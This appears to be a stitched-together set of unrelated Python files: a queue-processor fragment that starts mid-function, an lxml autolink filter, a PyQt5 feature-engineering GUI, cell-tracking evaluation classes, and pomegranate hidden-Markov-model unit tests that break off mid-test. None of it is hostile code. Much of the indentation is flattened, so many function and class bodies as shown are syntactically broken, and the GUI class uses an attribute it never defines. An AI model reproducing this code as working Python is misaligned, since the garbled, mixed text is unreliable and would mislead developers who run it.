res = None
self.error = True
break
if res is not None:
break
self._consume_from_queue()
return res
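# Illustrative usage sketch (not part of the original module): a top-level worker
# function (so multiprocessing can pickle it) squares each queued value and adds
# the offset passed as the worker's first argument.
def _square_worker(offset, value):
    return offset + value * value

if __name__ == '__main__':
    fastqueue = FastQueueProcessor(_square_worker, 10, 2)
    for item in [1, 2, 3, 4]:
        fastqueue.put(item)
    results = []
    while len(results) < 4 and not fastqueue.error:
        res = fastqueue.get()
        if res is not None:
            results.append(res)
    print(sorted(results))  # expected: [11, 14, 19, 26]
    del fastqueue  # sends EOF to the workers and joins them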
|
# from lxml.html import fromstring, tostring
from lxml.html.clean import autolink_html
def autolink(context=None):
    """The autolink filter automatically adds links.
    It does this by looking for things that look like links, which includes
    anything starting with `http`, `https`, and `mailto`, and replaces them
    with anchor elements.
    """
def render(content):
return autolink_html(content)
return render
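# Illustrative usage sketch (not part of the original module): the factory
# returns a render callable that wraps bare URLs in the given HTML fragment.
if __name__ == '__main__':
    render = autolink()
    print(render('<p>See http://example.com for details.</p>'))
    # expected output along the lines of:
    # <p>See <a href="http://example.com">http://example.com</a> for details.</p>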
|
# -*- coding: utf-8 -*-
"""The GUI of the feature_engineering module of easylearn
Created on Wed Jul 4 13:57:15 2018
@author: Li Chao
Email:lichao19870617@gmail.com
GitHub account name: lichao312214129
Institution (company): Brain Function Research Section, The First Affiliated Hospital of China Medical University, Shenyang, Liaoning, PR China.
License: MIT
"""
import sys
sys.path.append('../stylesheets/PyQt5_stylesheets')
import os
import json
import cgitb
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import (QApplication, QMainWindow, QFileDialog, QWidget,
                             QVBoxLayout, QListView, QMessageBox)
import PyQt5_stylesheets
from easylearn_feature_engineering_gui import Ui_MainWindow
class EasylearnFeatureEngineeringRun(QMainWindow, Ui_MainWindow):
def __init__(self, working_directory=None):
QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
        # initial setup
# connect main items signal to slot
self.items_stackedwedge_dict = {"Preprocessing": 0, "Dimension reduction": 1, "Feature selection": 2, "Unbalance treatment": 3, "None": 4}
self.pushButton_preprocessing.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_dimreduction.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_selection.clicked.connect(self.on_pushButton_items_clicked)
self.pushButton_unbalance_treatment.clicked.connect(self.on_pushButton_items_clicked)
# connect preprocessing setting signal to slot
self.preprocessing_stackedwedge_dict = {"Z-score normalization": 0, "Scaling": 1, "De-mean": 2, "None": 3}
self.radioButton_scaling.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
self.radioButton_zscore.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
self.radioButton_demean.clicked.connect(self.on_preprocessing_detail_stackedwedge_clicked)
# connect dimreduction setting signal to slot
self.dimreduction_stackedwedge_dict = {"PCA": 0, "ICA": 1, "LDA": 2, "LLE": 3, "None": 4}
self.radioButton_pca.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_ica.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_lda.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_lle.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
self.radioButton_none.clicked.connect(self.on_dimreduction_stackedwedge_clicked)
# connect feature selection setting signal to slot
self.feature_selection_stackedwedge_dict = {"Variance threshold": 0, "Correlation": 1, "Distance correlation": 2, "F-Score": 3, "Mutual information (classification)": 4}
self.radioButton_variance_threshold.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_correlation.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_distancecorrelation.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_fscore.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
self.radioButton_mutualinfo_cls.clicked.connect(self.on_feature_selection_stackedwedge_clicked)
# set appearance
self.set_run_appearance()
def set_run_appearance(self):
"""Set style_sheets
"""
qss_special = """QPushButton:hover
{
font-weight: bold; font-size: 15px;
}
"""
self.setWindowTitle('Feature Engineering')
self.setWindowIcon(QIcon('../logo/logo-upper.jpg'))
sender = self.sender()
if sender:
if (sender.text() in list(self.skins.keys())):
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style=self.skins[sender.text()]))
else:
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style="style_Dark"))
else:
self.setStyleSheet(PyQt5_stylesheets.load_stylesheet_pyqt5(style="style_Dark"))
        # Reset the stackedWidget to its default page at the beginning
self.stackedWidget_items.setCurrentIndex(4)
self.on_radioButton_not_scaling_clicked()
def on_pushButton_items_clicked(self):
print(self.sender().text())
self.stackedWidget_items.setCurrentIndex(self.items_stackedwedge_dict[self.sender().text()])
def on_preprocessing_detail_stackedwedge_clicked(self):
print(self.sender().text())
if self.sender().text():
self.stackedWidget_preprocessing_methods.setCurrentIndex(self.preprocessing_stackedwedge_dict[self.sender().text()])
else:
self.stackedWidget_preprocessing_methods.setCurrentIndex(-1)
def on_radioButton_not_scaling_clicked(self):
self.stackedWidget_preprocessing_methods.setCurrentIndex(1)
#%% radioButtons of dimreduction
def on_dimreduction_stackedwedge_clicked(self):
self.stackedWidget_dimreduction.setCurrentIndex(self.dimreduction_stackedwedge_dict[self.sender().text()])
def on_feature_selection_stackedwedge_clicked(self):
self.groupBox_feature_selection_input.setTitle(self.sender().text())
self.stackedWidget_feature_selection.setCurrentIndex(self.feature_selection_stackedwedge_dict[self.sender().text()])
def closeEvent(self, event):
"""This function is called when exit icon of the window is clicked.
This function make sure the program quit safely.
"""
# Set qss to make sure the QMessageBox can be seen
        reply = QMessageBox.question(self, 'Quit', "Are you sure you want to quit?",
                                     QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
if __name__ == "__main__":
app=QApplication(sys.argv)
md=EasylearnFeatureEngineeringRun()
md.show()
sys.exit(app.exec_())
|
import numpy as np
from cached_property import cached_property
from .utils import slices_intersection, slices_relative, parse_file_order
class CellOccurence:
def __init__(self, frame_number, cell_id, unique_id, position, colour=0):
"""
All parameters should be greater that zero.
Unique_id == -1 means that there is no tracking data.
colour = 0 - cell
colour != 0 - maybe cell
"""
self.frame_number = parse_file_order(frame_number)
self.cell_id = cell_id
self.unique_id = unique_id
self.position = position
self.colour = colour
self.mask = None
self.mask_slice = None
def get_id(self):
"""Return id of the cell in its frame."""
if (self.unique_id == -1):
return self.cell_id
else:
return self.unique_id
def get_triple(self):
"""Return (cell_id, posx, posy) or (unique_id, posx, posy)."""
return (self.get_id(), self.position[0], self.position[1])
def has_tracking_data(self):
return self.unique_id != -1
def has_contour_data(self):
return self.mask is not None
def obligatory(self):
return self.colour == 0
def distance(self, cell_b):
return ((self.position[0] - cell_b.position[0]) ** 2 + (self.position[1] - cell_b.position[1]) ** 2) ** 0.5
@cached_property
def area(self):
if self.has_contour_data():
return np.count_nonzero(self.mask)
return None
def overlap(self, cell_b):
if self.has_contour_data() and cell_b.has_contour_data():
slices_overlap = slices_intersection(self.mask_slice, cell_b.mask_slice)
if slices_overlap is not None:
slice_relative_1 = slices_relative(self.mask_slice, slices_overlap)
slice_relative_2 = slices_relative(cell_b.mask_slice, slices_overlap)
overlap = self.mask[slice_relative_1] & cell_b.mask[slice_relative_2]
return np.count_nonzero(overlap)
else:
return 0
return None
def iou(self, cell_b):
if self.has_contour_data() and cell_b.has_contour_data():
intersect = float(self.overlap(cell_b))
return intersect / (self.area + cell_b.area - intersect)
return None
def similarity(self, cell_b):
iou_with_b = self.iou(cell_b)
if iou_with_b is not None:
return iou_with_b
else:
return -self.distance(cell_b)
def is_similar(self, cell_b, position_cutoff, iou_cutoff):
iou_with_b = self.iou(cell_b)
if iou_with_b is not None:
return iou_with_b > iou_cutoff
else:
return self.distance(cell_b) < position_cutoff
def __hash__(self):
return hash(self.frame_number) ^ hash(self.get_id()) ^ hash(self.position) ^ hash(self.colour)
def __eq__(self, other):
return self.frame_number == other.frame_number and self.get_id() == other.get_id() and self.position == other.position and self.colour == other.colour
def __str__(self):
return "frame={0},id={1},position={2},color={3}".format(self.frame_number, self.get_id(), self.position,
self.colour)
class TrackingLink(object):
def __init__(self, cell_A, cell_B):
self.cell_A = cell_A
self.cell_B = cell_B
def __hash__(self):
return hash(self.cell_A) ^ hash(self.cell_B)
def __eq__(self, other):
return self.cell_A == other.cell_A and self.cell_B == other.cell_B
def __str__(self):
return "({0}-{1})".format(self.cell_A, self.cell_B)
def Enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.items())
enums['reverse_mapping'] = reverse
return type('Enum', (), enums)
EvaluationResult = Enum("CORRECT", "FALSE_POSITIVE", "FALSE_NEGATIVE", "UNKNOWN")
class EvaluationDetail(object):
"""Encapsulates the information about the evaluation results for further investigation.
Attributes:
frame - when the evaluation occurs
result - overall result description
"""
def __init__(self, frame, result):
self.result = result
self.frame = parse_file_order(frame)
def __str__(self):
return "{0} - {1}".format(self.frame, EvaluationResult.reverse_mapping[self.result])
def calculate_result(self, GT, algo):
if GT is not None and algo is not None:
result = EvaluationResult.CORRECT
elif GT is not None:
result = EvaluationResult.FALSE_NEGATIVE
elif algo is not None:
result = EvaluationResult.FALSE_POSITIVE
else:
result = EvaluationResult.UNKNOWN
return result
@staticmethod
def csv_headers():
return ["Frame", "Result"]
def csv_record(self):
return [self.frame, EvaluationResult.reverse_mapping[self.result]]
def csv_read(self, record):
self.frame = parse_file_order(record[0])
        self.result = getattr(EvaluationResult, record[1])
return record[2:]
class SegmentationResult(EvaluationDetail):
"""Contains the positions of the both ground truth and corresponding cell from the algorithm results. Potentially one of them is non-existent (False positive/negative).
Attributes:
cell_GT - cell from ground truth
cell_algo - cell found by an algorithm
"""
def __init__(self, cell_gt=None, cell_algo=None):
self.iou = None
if (not (cell_gt is None and cell_algo is None)):
EvaluationDetail.__init__(self, (cell_gt or cell_algo).frame_number,
self.calculate_result(cell_gt, cell_algo))
self.cell_GT = cell_gt
self.cell_algo = cell_algo
if cell_gt is not None and cell_algo is not None:
self.iou = self.cell_GT.iou(self.cell_algo)
else:
self.cell_GT = None
self.cell_algo = None
def __str__(self):
return "{0}: GT={1}, ALGO={2}".format(EvaluationDetail.__str__(self), self.cell_GT, self.cell_algo)
@staticmethod
def csv_headers():
return EvaluationDetail.csv_headers() + ["GT_id", "GT_pos_x", "GT_pos_y", "Algo_id", "Algo_pos_x", "Algo_pos_y",
"IOU"]
def csv_record(self):
record = EvaluationDetail.csv_record(self)
def print_cell(record, cell):
if cell:
record = record + [cell.cell_id] + list(cell.position)
else:
record = record + ["", "", ""]
return record
record = print_cell(record, self.cell_GT)
record = print_cell(record, self.cell_algo)
record += [self.iou]
return record
def csv_read(self, record):
record = EvaluationDetail.csv_read(self, record)
def read_cell(record):
return CellOccurence(self.frame, record[0], -1, (float(record[1]), float(record[2])))
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_NEGATIVE:
self.cell_GT = read_cell(record)
record = record[3:]
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_POSITIVE:
self.cell_algo = read_cell(record)
record = record[3:]
return record
@staticmethod
def csv_init(record):
sr = SegmentationResult()
sr.csv_read(record)
return sr
class TrackingResult(EvaluationDetail):
"""Contains the tracking links from both the ground truth and from the algorithm results. Potentially one of them is non-existent (False positive/negative).
Attributes:
prev_frame - number of the frame from which comes the other ends of the links
link_GT - link from ground truth
link_algo - link found by an algorithm
"""
def __init__(self, link_gt=None, link_algo=None):
if (not (link_gt is None and link_algo is None)):
EvaluationDetail.__init__(self, (link_gt or link_algo).cell_B.frame_number,
self.calculate_result(link_gt, link_algo))
self.prev_frame = (link_gt or link_algo).cell_A.frame_number
self.link_GT = link_gt
self.link_algo = link_algo
else:
self.link_GT = None
self.link_algo = None
def __str__(self):
return "{0}: GT_LINK={1}, ALGO_LINK={2}".format(EvaluationDetail.__str__(self), self.link_GT, self.link_algo)
@staticmethod
def csv_headers():
return EvaluationDetail.csv_headers() + ["Prev_frame",
"GT_unique_id", "GT_pos0_x", "GT_pos0_y", "GT_pos1_x", "GT_pos1_y",
"Algo_unique_id", "Algo_pos0_x", "Algo_pos0_y", "Algo_pos1_x",
"Algo_pos1_y"]
def csv_record(self):
record = EvaluationDetail.csv_record(self) + [self.prev_frame]
def print_link(record, link):
'@type link: TrackingLink'
if link:
record = record + [link.cell_A.unique_id] + list(link.cell_A.position) + list(link.cell_B.position)
else:
record = record + ["", "", "", "", ""]
return record
record = print_link(record, self.link_GT)
record = print_link(record, self.link_algo)
return record
def csv_read(self, record):
record = EvaluationDetail.csv_read(self, record)
self.prev_frame = parse_file_order(record[0])
record = record[1:]
def read_link(record, strip_record=False):
unique_id, pos0_x, pos0_y, pos1_x, pos1_y = tuple(record[:5])
if strip_record:
del record[:5]
return TrackingLink(CellOccurence(self.prev_frame, unique_id, unique_id, (float(pos0_x), float(pos0_y))),
CellOccurence(self.frame, unique_id, unique_id, (float(pos1_x), float(pos1_y))))
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_NEGATIVE:
self.link_GT = read_link(record)
del record[:5]
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_POSITIVE:
self.link_algo = read_link(record)
del record[:5]
return record
@staticmethod
def csv_init(record):
sr = TrackingResult()
sr.csv_read(record)
return sr
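# Illustrative usage sketch (not part of the original module): comparing two
# detections by centre distance when no contour masks are available. Assumes
# parse_file_order accepts the plain frame identifiers used below.
if __name__ == '__main__':
    cell_a = CellOccurence("001", 1, -1, (10.0, 12.0))
    cell_b = CellOccurence("001", 2, -1, (11.0, 12.5))
    print(cell_a.distance(cell_b))       # ~1.118
    print(cell_a.similarity(cell_b))     # no masks, so falls back to -distance
    print(cell_a.is_similar(cell_b, position_cutoff=5, iou_cutoff=0.5))  # True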
|
from __future__ import (division, print_function)
from pomegranate import *
from nose.tools import with_setup
from nose.tools import assert_equal
from nose.tools import assert_not_equal
from nose.tools import assert_raises
import random
import numpy as np
import json
def setup():
'''
Build a model that we want to use to test sequences. This model will
be somewhat complicated, in order to extensively test YAHMM. This will be
a three state global sequence alignment HMM. The HMM models a reference of
'ACT', with pseudocounts to allow for slight deviations from this
reference.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transition( model.start, m1, 0.9 )
model.add_transition( model.start, i0, 0.1 )
model.add_transition( m1, m2, 0.9 )
model.add_transition( m1, i1, 0.05 )
model.add_transition( m1, d2, 0.05 )
model.add_transition( m2, m3, 0.9 )
model.add_transition( m2, i2, 0.05 )
model.add_transition( m2, d3, 0.05 )
model.add_transition( m3, model.end, 0.9 )
model.add_transition( m3, i3, 0.1 )
# Create transitions from insert states
model.add_transition( i0, i0, 0.70 )
model.add_transition( i0, d1, 0.15 )
model.add_transition( i0, m1, 0.15 )
model.add_transition( i1, i1, 0.70 )
model.add_transition( i1, d2, 0.15 )
model.add_transition( i1, m2, 0.15 )
model.add_transition( i2, i2, 0.70 )
model.add_transition( i2, d3, 0.15 )
model.add_transition( i2, m3, 0.15 )
model.add_transition( i3, i3, 0.85 )
model.add_transition( i3, model.end, 0.15 )
# Create transitions from delete states
model.add_transition( d1, d2, 0.15 )
model.add_transition( d1, i1, 0.15 )
model.add_transition( d1, m2, 0.70 )
model.add_transition( d2, d3, 0.15 )
model.add_transition( d2, i2, 0.15 )
model.add_transition( d2, m3, 0.70 )
model.add_transition( d3, i3, 0.30 )
model.add_transition( d3, model.end, 0.70 )
# Call bake to finalize the structure of the model.
model.bake()
def multitransition_setup():
'''
Build a model that we want to use to test sequences. This is the same as the
above model, except that it uses the multiple transition methods for building.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transitions( model.start, [m1, i0], [0.9, 0.1] )
model.add_transitions( m1, [m2, i1, d2], [0.9, 0.05, 0.05] )
model.add_transitions( m2, [m3, i2, d3], [0.9, 0.05, 0.05] )
model.add_transitions( m3, [model.end, i3], [0.9, 0.1] )
# Create transitions from insert states
model.add_transitions( i0, [i0, d1, m1], [0.7, 0.15, 0.15] )
model.add_transitions( i1, [i1, d2, m2], [0.7, 0.15, 0.15] )
model.add_transitions( i2, [i2, d3, m3], [0.7, 0.15, 0.15] )
model.add_transitions( [i3, i3], [i3, model.end], [0.85, 0.15] )
# Create transitions from delete states
model.add_transitions( d1, [d2, i1, m2], [0.15, 0.15, 0.70] )
model.add_transitions( [d2, d2, d2, d3, d3], [d3, i2, m3, i3, model.end],
[0.15, 0.15, 0.70, 0.30, 0.70 ] )
# Call bake to finalize the structure of the model.
model.bake()
def tied_edge_setup():
'''
Build a model that we want to use to test sequences. This model has
tied edges.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transition( model.start, m1, 0.9 )
model.add_transition( model.start, i0, 0.1 )
model.add_transition( m1, m2, 0.9 )
model.add_transition( m1, i1, 0.05 )
model.add_transition( m1, d2, 0.05 )
model.add_transition( m2, m3, 0.9 )
model.add_transition( m2, i2, 0.05 )
model.add_transition( m2, d3, 0.05 )
model.add_transition( m3, model.end, 0.9 )
model.add_transition( m3, i3, 0.1 )
# Create transitions from insert states
model.add_transition( i0, i0, 0.70, group="i_a" )
model.add_transition( i0, d1, 0.15, group="i_b" )
model.add_transition( i0, m1, 0.15, group="i_c" )
model.add_transition( i1, i1, 0.70, group="i_a" )
model.add_transition( i1, d2, 0.15, group="i_b" )
model.add_transition( i1, m2, 0.15, group="i_c" )
model.add_transition( i2, i2, 0.70, group="i_a" )
model.add_transition( i2, d3, 0.15, group="i_b" )
model.add_transition( i2, m3, 0.15, group="i_c" )
model.add_transition( i3, i3, 0.85, group="i_a" )
model.add_transition( i3, model.end, 0.15 )
# Create transitions from delete states
model.add_transition( d1, d2, 0.15, group="d_a" )
model.add_transition( d1, i1, 0.15, group="d_b" )
model.add_transition( d1, m2, 0.70, group="d_c" )
model.add_transition( d2, d3, 0.15, group="d_a" )
model.add_transition( d2, i2, 0.15, group="d_b" )
model.add_transition( d2, m3, 0.70, group="d_c" )
model.add_transition( d3, i3, 0.30 )
model.add_transition( d3, model.end, 0.70 )
# Call bake to finalize the structure of the model.
model.bake()
def teardown():
'''
Remove the model at the end of the unit testing. Since it is stored in a
    global variable, simply delete it.
'''
pass
@with_setup( setup, teardown )
def test_same_length_viterbi():
scores = [ -0.5132449003570658, -11.048101241343396, -9.125519674022627,
-5.0879558788604475 ]
sequences = [ list(x) for x in [ 'ACT', 'GGC', 'GAT', 'ACC' ] ]
for seq, score in zip( sequences, scores ):
assert_equal( model.viterbi( seq )[0], score )
assert_raises( ValueError, model.viterbi, list('XXX') )
@with_setup( setup, teardown )
def test_variable_length_viterbi():
scores = [ -5.406181012423981, -10.88681993576597, -3.6244718790494277,
-3.644880750680635, -10.674332964640293, -10.393824835172445,
-8.67126440174503, -16.903451796110275, -16.451699654050792 ]
sequences = [ list(x) for x in ('A', 'GA', 'AC', 'AT', 'ATCC',
'ACGTG', 'ATTT', 'TACCCTC', 'TGTCAACACT') ]
for seq, score in zip( sequences, scores ):
assert_equal( model.viterbi( seq )[0], score )
@with_setup( setup, teardown )
def test_log_probability():
scores = [ -5.3931, -0.5052, -11.8478, -14.3482 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
for seq, score in zip( sequences, scores ):
assert_equal( round( model.log_probability( seq ), 4 ), score )
@with_setup( setup, teardown )
def test_posterior_transitions():
a_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
b_scores = [ 0.013, 0.0036, 1.9836, 2.145 ]
c_scores = [ 0.013, 0.0035, 0.817, 0.477 ]
d_scores = [ 1.0, 0.0023, 0.2636, 0.3682 ]
t_scores = [ 4.013, 4.0083, 6.457, 8.9812 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['I2'], indices['I0'], indices['D1'], indices['D2']
scores = zip( sequences, a_scores, b_scores, c_scores, d_scores, t_scores )
for seq, a, b, c, d, t in scores:
trans, ems = model.forward_backward( seq )
assert_equal( round( trans[i].sum(), 4 ), a )
assert_equal( round( trans[j].sum(), 4 ), b )
assert_equal( round( trans[k].sum(), 4 ), c )
assert_equal( round( trans[l].sum(), 4 ), d )
assert_equal( round( trans.sum(), 4 ), t )
@with_setup( setup, teardown )
def test_posterior_transitions_w_training():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2 = indices['I0'], indices['I1'], indices['I2']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False )
transitions = model.dense_transition_matrix()
assert_not_equal( transitions[d1, i1], transitions[d2, i2] )
assert_not_equal( transitions[i0, m1], transitions[i1, m2] )
assert_not_equal( transitions[d1, d2], transitions[d2, d3] )
assert_not_equal( transitions[i0, d1], transitions[i1, d2] )
assert_not_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( setup, teardown )
def test_posterior_transitions_w_vtraining():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2, i3 = indices['I0'], indices['I1'], indices['I2'], indices['I3']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False, algorithm='viterbi' )
transitions = model.dense_transition_matrix()
assert_not_equal( transitions[i0, i0], transitions[i1, i1] )
assert_not_equal( transitions[d1, d2], transitions[d2, d3] )
assert_not_equal( transitions[i0, d1], transitions[i1, d2] )
assert_not_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( tied_edge_setup, teardown )
def test_posterior_transitions_w_tied_training():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2, i3 = indices['I0'], indices['I1'], indices['I2'], indices['I3']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False )
transitions = model.dense_transition_matrix()
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( tied_edge_setup, teardown )
def test_posterior_transitions_w_tied_vtraining():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2 = indices['I0'], indices['I1'], indices['I2']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False, algorithm='viterbi' )
transitions = model.dense_transition_matrix()
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( setup, teardown )
def test_posterior_emissions():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( multitransition_setup, teardown )
def test_posterior_emissions_w_multitransition_setup():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
